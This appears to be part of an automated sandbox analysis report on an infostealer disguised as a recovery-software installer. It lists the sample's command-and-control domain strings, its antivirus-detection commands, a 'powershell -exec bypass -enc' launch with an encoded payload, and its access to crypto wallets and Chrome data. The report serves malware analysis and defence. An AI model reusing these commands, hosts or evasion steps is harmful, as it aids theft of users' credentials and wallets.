                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: discokeyus.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: grannyejh.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: shearhoaxx.click
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "GERMANY" False
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe "C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp | Process created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp | Process created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -enc lgaoacgarwbfafqalqb2ageaugbjaeeaqgbmaguaiaanacoatqbkahiakganackalgbuageatqblafsamwasadeamqasadiaxqatagoabwbjag4ajwanackaiaaoacgakaanafmarqb0ac0adgbhafiasqbhaeiabablacaakaa2afmadga4ag0ayqa2afmadgaradyauwb2aeyawga2afmadgapacaaiaaoacaawwbuafkacaanacsajwbfaf0akaa2afmadgb7adiafqb7adaafqb7admafqb7adqafqb7adeafqa2afmadgataeyababuafyazqbsafqavgasagwavaanacsajwbwaekatgbsafqavgasagwavabwafmaeqanacsajwbtafqababuafyalabsafqavgbtac4aaqbvagwavabwacwababuafyalgbtaguarqblag8augbjaecababuafyakqapadsaiabzaeuadaataekavablae0aiaagafyayqbyagkayqbiagwazqa6adgaqqbqagmaiaagacgaiabbafqaeqbwaguaxqaoadyauwb2ahsamqb9ahsamgb9ahsamab9accakwanadyauwb2acaalqbgacaababuafyarabsafqavgasagwavabwafmawqbzagwavabwacwababuafyadabfae0algbnafuajwaraccasqbsafqajwaraccavgapacaaiaapacaaowagahmavgagagmazwawaccakwanaheaiaaoacaawwb0afkauablaf0akaa2afmadgb7admafqb7adaafqb7adeafqb7adqafqb7adiafqa2afmadgagac0argbsafqavgb0aguatqauagkatwanacsajwbsafqavgasagwavabwac4auabsafqavgasagwavabwaggababuafyalabsafqavgbtafkauwbsafqavgasagwavabwaeeavaanacsajwbsafqavgapackajwaraccaiaa7acaauwblahqalqbwageacgbpaccakwanageaygbsaguaiaatae4ayqbtaguaiab1aeiamgbnahqaiaatafyayqbsahuazqagacgawwbuafkauablaf0akaa2afmadgb7adeafqb7adiafqb7adaafqb7admafqa2afmadgagac0azgagagwavabwaeuabqauaekajwaraccatwauaeyababuafyalabsafqavgbtahkababuafyalabsafqavgbtafqababuafyalabsafqavgbjaewarqbsafqavgapackaiaagadsaiabtaguadaatafyayqbyagkayqbiagwazqagac0atgbhag0azqagahmaywbsaekauabuaeiatabpaemaawagac0avgbhagwadqblacaakab7aaoaiaanacsajwagacaaiabtaguadaatafyayqbyagkayqbiagwazqagac0atgbhag0azqagafoasqbqafuaugbsacaalqbwageabab1aguaiaaoadyauwb2ahsamwb9ahsanwb9ahsangb9ahsanab9ahsaoqb9ahsamqb9ahsamqawah0aewa4ah0aewawah0aewa1ah0aewayah0angbtahyaiaatagyababuafyadabsaccakwanafqavgasagwavabwahaalwbsaccakwanafqavgasagwavabwahqaeab0agwavabwacwababuafyaaab0agwavabwacwababuafyaaqbwahqazqbkaguababuafyalabsafqavgbfagmababwaf8acabhag4algbsafqavgasagwavabwahmaogavac8aawbsagwavabwacwababuafyadabwagwavabwacwababuafyabgbsafqavgasagwavabwaggabwbhac4acwboaccakwanag8ababuafyalabsafqavgbpagwavabwackacgagacaaiaagafmazqb0ac0avgbhahiaaqbhagiabablacaalqboageabqblacaadwbfaeiaywbsaekarqboahqaiaatafyayqbsahuazqagacgalgaoadyauwb2ahsamqb9ahsamgb9ahsamab9adyauwb2acaalqbmagwavabwagoazqbjahqababuafyalabsafqavgboaguadwbsafqavgasagwavabwac0atwbiagwavabwackaiaaoadyauwb2ahsamqb9ahsamab9ahsamgb9ahsamwb9adyauwb2ac0azgagagwavabwaguadaauafcababuafyalabsafqavgbtahkacwanacsajwb0aguabqauae4ababuafyalabsafqavgblagwavabwacwababuafyajwaraccaygbdagwaaqblag4adabsafqavgapackacganacsajwagacaaiaagafmazqb0ac0avgbhahiaaqbhagiajwaraccabablacaalqboageabqblacaawgbpafaazabhahqaqqagac0avgbhagwadqblaccakwanacaakabeahkarqb7ahcazqbcafuabqbcaematabcafuabqbjaeuabgbuah0algaoadyauwb2ahsamwb9ahsamqb9ahsamab9ahsamgb9adyauwb2acaalqbmagwavabwageadabsafqavgasagwavabwageazabeagwavabwacwababuafyayqbsafqavgasagwavabwaeqabwb3ag4ababvagwavabwackalgbjag4adgbvagsazqaoaccakwanaeqaeqbfahsaegbcafuabqbjafaaqgbvag0avqbyagwafqapaccakwanackac
                Source: Palestine.com, 00000011.00000000.1281472018.0000000000BB3000.00000002.00000001.01000000.00000009.sdmp, Palestine.com, 00000011.00000003.1466749906.000000000514E000.00000004.00000800.00020000.00000000.sdmp, electronics.exe, 00000043.00000000.2221093128.0000000000331000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Progmanj
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Shell_TrayWndjh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp | Queries volume information: C:\Users\user\AppData\Roaming\Panorado\electronics.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Palestine.com, 00000011.00000003.1993781956.0000000001D6A000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2023662646.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D6C000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: find.exe, 0000003A.00000002.2191232545.0000014B3E217000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000003A.00000002.2191653265.0000014B3E524000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avgui.exe
                Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: Process Memory Space: Palestine.com PID: 6176, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Palestine.com PID: 6148, type: MEMORYSTR
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: +ets/Electrum-LTC
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ElectronCashE
                Source: Palestine.com, 00000011.00000003.1993781956.0000000001D6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Libertyows
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exod
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3{"
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystod>
                Source: Palestine.com, 00000011.00000003.1586865822.0000000001D50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Palestine.com, 0000001F.00000002.2389704146.0000000001677000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
